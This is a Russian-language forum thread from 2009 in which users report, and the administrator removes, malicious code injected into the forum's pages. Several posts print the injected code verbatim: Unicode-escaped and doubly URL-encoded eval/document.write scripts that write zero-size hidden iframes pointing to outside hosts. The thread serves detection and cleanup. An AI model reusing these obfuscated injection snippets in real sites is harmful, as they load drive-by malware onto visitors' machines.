IPB Экспедиционные багажники

Здравствуйте, гость ( Вход | Регистрация )

 
Ответить в данную темуНачать новую тему
Так и надо!? Подозрительный код на форуме.
Pikabu  
сообщение 2.6.2009, 21:32
Сообщение #1


почтенный флудер
***

Группа: Пользователи
Сообщений: 225
Регистрация: 8.5.2009
Из: Москва, ЮАО




Не знаю зачем smile.gif но глянул тут внутрянку страниц сайта и форума, на сайте то кроме кроме нюансов верстки больше придраться не к чему, а вот на форуме меня заинтересовало несколько строчек.

Во первых 16ая строка, которая в "зашифрованном" виде выглядит вот так (поставил несколько пробелов что б страницу не разрывало по горизонту):

Код
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020 \u0073\u0072\u0063 \u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0072\u0074\u002d\u006b\u0079\u0069 \u0076\u002e\u0063\u006f\u006d\u002f\u0035\u0030\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070 \u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065 \u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f \u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>


А при "очеловечивании" (декодировании) магическим образом превращается в:

Код
<iframe[space]src=” (straight quotes)http://art– (minus)kyiv. (period)com/50/index. (period)php” (straight quotes)[space]width=” (straight quotes)0” (straight quotes)[space]height=” (straight quotes)0” (straight quotes)[space]frameborder=” (straight quotes)0” (straight quotes)></iframe>


Нулевой ифрэйм!? blink.gif Прикольно! Сайт по адресу "art-kyiv.com" в данный момент не работает т.к. не оплачен, но как удалось понять это какая то украинская галерея искусств! blink.gif Это к вам имеет отношение!?

Ну и во-вторых, 17ая строка, которая выглядит следующим образом:

Код
<iframe src="http://georgenatas.in/cn.php?aba" width="0" height="0" style="display:none;"></iframe>


По этому сайту и домену еще больше непонятного. Для просмотра он недоступен, упоминаний о нем в поиске практически нет, а из тех что есть толком ничего не понятно.

Да и вообще, если я вижу такие шифры, ифрэймы с нулевыми размерами и запретом отображения на экране... Странно как то это все... Или вы вкурсе про это дело и так и должно быть?
Перейти в начало страницы
 
+Цитировать сообщение
Monster  
сообщение 2.6.2009, 22:25
Сообщение #2


почтенный флудер
***

Группа: Пользователи
Сообщений: 168
Регистрация: 26.5.2009
Из: Московская область




Во-во! вот эта хня уже достала... ""art-kyiv.com"
Перейти в начало страницы
 
+Цитировать сообщение
сообщение 2.6.2009, 22:29
Сообщение #3


Начинающий беспредельщик
****

Группа: Пользователи
Сообщений: 1167
Регистрация: 12.3.2009
Из: 33 Еврейский Автономный Округ




Катрин, для какой ты выставки сайтик то делала???
Перейти в начало страницы
 
+Цитировать сообщение
сообщение 3.6.2009, 8:03
Сообщение #4


шустрый юзер
**

Группа: Пользователи
Сообщений: 60
Регистрация: 23.4.2009
Из: Лужковск




Угу. И опять с этого сайта открываются странные PDF-ки. Единственно содержание которых (насколько я понял) - JavaScript
Перейти в начало страницы
 
+Цитировать сообщение
nusha  
сообщение 3.6.2009, 15:31
Сообщение #5


Администратор
**

Группа: Администраторы
Сообщений: 16
Регистрация: 10.3.2009
Из: Moscow




Цитата(Pikabu @ 2.6.2009, 22:32) *
Код
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020 \u0073\u0072\u0063 \u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0072\u0074\u002d\u006b\u0079\u0069 \u0076\u002e\u0063\u006f\u006d\u002f\u0035\u0030\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070 \u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065 \u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f \u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>


Код
<iframe src="http://georgenatas.in/cn.php?aba" width="0" height="0" style="display:none;"></iframe>



ага...нашла эти коды в базе...удалила...все стало хорошо...я надеюсь у всех...
Перейти в начало страницы
 
+Цитировать сообщение
Monster  
сообщение 3.6.2009, 23:51
Сообщение #6


почтенный флудер
***

Группа: Пользователи
Сообщений: 168
Регистрация: 26.5.2009
Из: Московская область




Да, спасибо большое. у меня все нормально. Да думаю и у всех тоже.
Перейти в начало страницы
 
+Цитировать сообщение
Pikabu  
сообщение 5.6.2009, 1:41
Сообщение #7


почтенный флудер
***

Группа: Пользователи
Сообщений: 225
Регистрация: 8.5.2009
Из: Москва, ЮАО




Проверяйте код где формируется нижняя часть страниц форума, примерно 30ая строки снизу, текст бяки выглядит следующим образом:

Код
<script>eval(unescape("eval%28unescape%28%22document.write%2528String.fromCharCode %252860%252C105%252C102%252C114%252C97%252C109%252C101%252C32%252C115 %252C114%252C99%252C61%252C34%252C104%252C116%252C116%252C112%252C58%252C47 %252C47%252C97%252C114%252C116%252C45%252C107%252C121%252C105%252C118%252C46 %252C99%252C111%252C109%252C47%252C53%252C48%252C47%252C105%252C110%252C100 %252C101%252C120%252C46%252C112%252C104%252C112%252C34%252C32%252C119%252C105 %252C100%252C116%252C104%252C61%252C34%252C48%252C34%252C32%252C104%252C101 %252C105%252C103%252C104%252C116%252C61%252C34%252C48%252C34%252C32%252C115 %252C116%252C121%252C108%252C101%252C61%252C34%252C100%252C105%252C115%252C112 %252C108%252C97%252C121%252C58%252C110%252C111%252C110%252C101%252C59%252C34 %252C62%252C60%252C47%252C105%252C102%252C114%252C97%252C109%252C101%252C62 %2529%2529%253B%22%29%29%3B"));</script>


Советую не тянуть с этим делом, уже гугл хром не пускает к вам на форум, ругается на потенциально небезопасный контент!!!
Перейти в начало страницы
 
+Цитировать сообщение
nusha  
сообщение 5.6.2009, 9:18
Сообщение #8


Администратор
**

Группа: Администраторы
Сообщений: 16
Регистрация: 10.3.2009
Из: Moscow




Цитата(Pikabu @ 5.6.2009, 2:41) *
Проверяйте код где формируется нижняя часть страниц форума, примерно 30ая строки снизу, текст бяки выглядит следующим образом:

Код
<script>eval(unescape("eval%28unescape%28%22document.write%2528String.fromCharCode %252860%252C105%252C102%252C114%252C97%252C109%252C101%252C32%252C115 %252C114%252C99%252C61%252C34%252C104%252C116%252C116%252C112%252C58%252C47 %252C47%252C97%252C114%252C116%252C45%252C107%252C121%252C105%252C118%252C46 %252C99%252C111%252C109%252C47%252C53%252C48%252C47%252C105%252C110%252C100 %252C101%252C120%252C46%252C112%252C104%252C112%252C34%252C32%252C119%252C105 %252C100%252C116%252C104%252C61%252C34%252C48%252C34%252C32%252C104%252C101 %252C105%252C103%252C104%252C116%252C61%252C34%252C48%252C34%252C32%252C115 %252C116%252C121%252C108%252C101%252C61%252C34%252C100%252C105%252C115%252C112 %252C108%252C97%252C121%252C58%252C110%252C111%252C110%252C101%252C59%252C34 %252C62%252C60%252C47%252C105%252C102%252C114%252C97%252C109%252C101%252C62 %2529%2529%253B%22%29%29%3B"));</script>


Советую не тянуть с этим делом, уже гугл хром не пускает к вам на форум, ругается на потенциально небезопасный контент!!!



Ага...удалила этот код в базе...
Спасибо!!!
Перейти в начало страницы
 
+Цитировать сообщение
Pikabu  
сообщение 5.6.2009, 9:56
Сообщение #9


почтенный флудер
***

Группа: Пользователи
Сообщений: 225
Регистрация: 8.5.2009
Из: Москва, ЮАО




Цитата(nusha @ 5.6.2009, 10:18) *
Ага...удалила этот код в базе...
Спасибо!!!


Google Chrome успокоился и снова свободно пускает на форум, так что верным путем идем товарищи! biggrin.gif
Перейти в начало страницы
 
+Цитировать сообщение

Ответить в данную темуНачать новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



Версия для КПК Сейчас: 28.3.2024, 12:12
    Rambler's Top100